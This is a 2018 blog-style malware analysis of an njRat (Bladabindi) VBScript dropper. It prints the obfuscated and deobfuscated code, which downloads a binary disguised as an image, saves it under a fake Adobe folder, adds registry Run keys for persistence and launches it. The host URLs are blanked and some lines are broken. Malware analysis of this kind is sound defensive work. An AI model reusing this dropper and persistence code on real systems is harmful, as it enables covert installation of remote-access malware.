Thursday, November 22, 2018

Analysing njRat a.k.a Generic.MSIL.Bladabindi downloader

Yesterday (21.11.2018) njRat a.k.a dropper code was set to It was still available today in The dropper downloads and persists excutable which is known as Generic.MSIL.Bladabindi.1E8DC4B3

VBS code downloads an executable with SHA256 hash c26f8c36052c150625a0e2e2676af5fa7e7d222bb2343720a66d48c7a9855256 and it can be found on VirusTotal

Script code contains very long obfuscated lines. Firstly I dissected long lines shorter and prefixed then. So I got the following code:

Dim str
str = Chr(27 + 84) & Chr(16 + 94) & Chr(-12 + 44) & Chr(18 + 83) & Chr(60 + 54) & Chr(51 + 63) & Chr(205 - 94)
str = str & Chr(43 + 71) & Chr(60 - 28) & Chr(41 + 73) & Chr(60 + 41) & Chr(7475 / 65) & Chr(135 - 18) & Chr(118 - 9)
str = str & Chr(64 + 18) & Chr(19 + 93) & Chr(147 - 33) & Chr(37 * 3) & Chr(140 - 41) & Chr(171 - 70) & Chr(62 + 53)
str = str & Chr(80 + 35) & Chr(40 - 27) & Chr(780 / 78)
? str

Deobfuscated code is a VB script code too:

on error resume next
WScript.Sleep 60
Dim ofso
Set ofso = CreateObject("Scripting.FileSystemObject")
Sub CreerRep(Chemin)
    If Not ofso.FolderExists(chemin) Then
    End If
End Sub

dim process
set SSSSS = CreateObject("Microsoft.XMLHTTP")
set process = CreateObject("")
Set PPPPP = createobject("Adodb.Stream")
URL = ""
Rprocess = "C:\ProgramData\Adobe\system32\process.exe" "GET", URL, False
with PPPPP
    .type = 1 '//binary
    .write SSSSS.responseBody
    .savetofile "C:\ProgramData\Adobe\system32\process.exe", 2
end with

Set ObjetRegedit = CreateObject("WScript.Shell")
CleRegistre = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CPU64"
ObjetRegedit.RegWrite CleRegistre, "C:\ProgramData\Adobe\system32\CPU64.exe", "REG_SZ"
CleRegistre = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\process"
ObjetRegedit.RegWrite CleRegistre, "C:\ProgramData\Adobe\system32\process.exe", "REG_SZ"
CleRegistre = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dekstop"
ObjetRegedit.RegWrite CleRegistre, "C:\ProgramData\Adobe\system32\dekstop.ini.vbs", "REG_SZ"
Set ObjetRegedit = Nothing

WScript.Sleep 6000 Rprocess

First the code creates C:\ProgramData\Adobe\system32\ folder for the final executable. Next  an XMLHTTP object is created. Object downloads a jpeg-image from which is at this moment still available. The file is of course not an image but njRat executable. The file saved as C:\ProgramData\Adobe\system32\process.exe.

For persisting the executable, the script uses Windows Registry. The script code creates three new keys under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, namely: CPU64, process and dekstop (yes it has a typo). Registry key values are: C:\ProgramData\Adobe\system32\CPU64.exe, C:\ProgramData\Adobe\system32\process.exe and C:\ProgramData\Adobe\system32\dekstop.ini.vbs respectively. So it seems that the first and third registry keys are redundant and only HKCU \Software\Microsoft\Windows\CurrentVersion\Run\process key does persist this malware.

Finally script code uses object to launch downloaded payload.